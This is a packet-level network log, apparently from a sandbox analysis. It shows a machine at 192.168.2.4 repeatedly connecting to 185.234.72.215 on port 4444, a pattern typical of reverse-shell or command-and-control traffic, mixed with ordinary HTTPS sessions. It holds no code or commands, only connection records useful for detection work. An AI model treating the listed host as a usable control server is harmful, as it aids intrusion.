Jan 4, 2025 00:02:09.549489975 CET | 49738 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 00:02:09.554291010 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554414034 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554431915 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554442883 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554533005 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554543972 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554553986 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554658890 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554670095 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.554677963 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559034109 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559051991 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559158087 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559166908 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559212923 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559228897 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559283018 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559308052 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559365034 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559374094 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.559426069 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:09.783204079 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:09.783236980 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:09.783334017 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:09.783464909 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:09.783482075 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.317853928 CET | 49737 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 00:02:10.322654963 CET | 4444 | 49737 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.421518087 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.422768116 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.422789097 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.423917055 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.424078941 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.426026106 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.426099062 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.426685095 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.426692009 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.499066114 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.530539036 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.530564070 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.530651093 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.530668020 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.530678988 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.530728102 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.551039934 CET | 49738 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 00:02:10.613531113 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.613547087 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.613581896 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.613593102 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.613641024 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.613656998 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.613687992 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.615432978 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.615458012 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.615490913 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.615500927 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.615509987 CET | 443 | 49751 | 13.107.246.67 | 192.168.2.4
Jan 4, 2025 00:02:10.615534067 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.615550041 CET | 49751 | 443 | 192.168.2.4 | 13.107.246.67
Jan 4, 2025 00:02:10.628951073 CET | 49738 | 4444 | 192.168.2.4 | 185.234.72.215
Jan 4, 2025 00:02:10.633843899 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.633856058 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.633874893 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.633883953 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.633989096 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.633999109 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634118080 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634124041 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634130001 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634130955 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634159088 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634169102 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634311914 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634321928 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634330034 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
Jan 4, 2025 00:02:10.634340048 CET | 4444 | 49738 | 185.234.72.215 | 192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.634358883 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.634372950 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.634417057 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.634427071 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.634438038 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.669594049 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.669626951 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.669691086 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.669972897 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.669991016 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.699794054 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.699817896 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.699887037 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.699918032 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.699954033 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.701158047 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.701183081 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.701287031 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.701292992 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.701318979 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.702518940 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.702533007 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.702579975 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.702586889 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.702718019 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.704055071 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.704077005 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.704121113 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.704127073 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.704160929 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.748243093 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786762953 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786787033 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786830902 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786838055 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786859989 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.786880016 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.787920952 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.787940025 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.788003922 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.788009882 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.788042068 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.788054943 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.789520025 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.789535046 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.789597034 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.789602041 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.789654016 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790472984 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790496111 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790540934 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790544987 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790574074 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.790594101 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792105913 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792124987 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792170048 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792175055 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792205095 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792216063 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.792974949 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.793023109 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.793037891 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.793040037 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.793085098 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.796068907 CET49751443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:10.796073914 CET4434975113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.321285009 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.321561098 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.321599007 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.322654009 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.322715044 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.324006081 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.324083090 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.332740068 CET497374444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.337677002 CET444449737185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.388828993 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.388842106 CET44349755142.250.185.196192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.514281988 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.538743973 CET49755443192.168.2.4142.250.185.196
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.565742016 CET497384444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.578704119 CET497384444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583568096 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583610058 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583630085 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583638906 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583722115 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583731890 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583743095 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583806992 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583817005 CET444449738185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:11.583832979 CET444449738185.234.72.215192.168.2.4
Jan 4, 2025 00:02:11.583853960 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583863020 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583900928 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583909988 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583950043 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583960056 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583971977 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.583981037 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.584052086 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.584062099 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:11.584070921 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:12.340379953 CET  49737  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:12.345154047 CET  4444  49737  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:12.389957905 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:12.390053034 CET  49738  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:12.390110016 CET  49738  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:12.391720057 CET  4444  49737  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:12.391798973 CET  49737  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:12.394927979 CET  4444  49738  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:13.367717981 CET  49737  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:13.372473955 CET  4444  49737  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:18.897994995 CET  49723  80  192.168.2.4  199.232.214.172
Jan 4, 2025 00:02:18.902947903 CET  80  49723  199.232.214.172  192.168.2.4
Jan 4, 2025 00:02:18.903145075 CET  49723  80  192.168.2.4  199.232.214.172
Jan 4, 2025 00:02:20.769398928 CET  49672  443  192.168.2.4  173.222.162.32
Jan 4, 2025 00:02:20.769431114 CET  443  49672  173.222.162.32  192.168.2.4
Jan 4, 2025 00:02:21.256869078 CET  443  49755  142.250.185.196  192.168.2.4
Jan 4, 2025 00:02:21.257035017 CET  443  49755  142.250.185.196  192.168.2.4
Jan 4, 2025 00:02:21.257102966 CET  49755  443  192.168.2.4  142.250.185.196
Jan 4, 2025 00:02:21.270993948 CET  49755  443  192.168.2.4  142.250.185.196
Jan 4, 2025 00:02:21.271015882 CET  443  49755  142.250.185.196  192.168.2.4
Jan 4, 2025 00:02:22.297538042 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:22.297579050 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:22.297954082 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:22.298608065 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:22.298628092 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:22.937283039 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:23.019634962 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:23.019646883 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:23.020066977 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:23.046168089 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:23.046256065 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:23.262782097 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:23.738641977 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:23.749861002 CET  49733  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:23.754689932 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:27.684670925 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:27.684762001 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:27.684860945 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:27.693675041 CET  49855  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:27.693685055 CET  443  49855  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:29.474571943 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:29.474647045 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:29.474814892 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:29.475205898 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:29.475219011 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:30.160161018 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:30.160417080 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:30.160442114 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:30.160908937 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:30.161375046 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:30.161529064 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:30.237202883 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:34.122637987 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.256378889 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.256433964 CET  49733  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.295774937 CET  49908  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.297445059 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.300637007 CET  4444  49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.300713062 CET  49908  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.300769091 CET  49908  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.302304983 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.302366018 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.302475929 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.305533886 CET  4444  49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.307246923 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.361651897 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366563082 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366580963 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366599083 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366607904 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366620064 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366641998 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366653919 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366663933 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366667986 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366703987 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366705894 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366715908 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366722107 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366750956 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366765022 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366775990 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.366779089 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.366810083 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.371438026 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.371450901 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.371462107 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.371546030 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.371555090 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.417504072 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.490128994 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.612435102 CET  49733  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.630032063 CET  4444  49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.633312941 CET  49913  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.638086081 CET  4444  49913  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.638256073 CET  49913  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.638297081 CET  49913  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.643071890 CET  4444  49913  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:34.747230053 CET  49733  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:34.880851030 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:34.880925894 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:34.881016970 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:35.094979048 CET  49890  443  192.168.2.4  13.107.246.67
Jan 4, 2025 00:02:35.095000982 CET  443  49890  13.107.246.67  192.168.2.4
Jan 4, 2025 00:02:35.310899973 CET  49908  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:35.315768957 CET  4444  49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:35.519896984 CET  4444  49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:35.584270954 CET  49909  4444  192.168.2.4  185.234.72.215
Jan 4, 2025 00:02:35.589190006 CET  4444  49909  185.234.72.215  192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589198112 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589256048 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589260101 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589301109 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589304924 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589354038 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589370966 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589412928 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589416981 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589452982 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:35.589481115 CET444449909185.234.72.215192.168.2.4
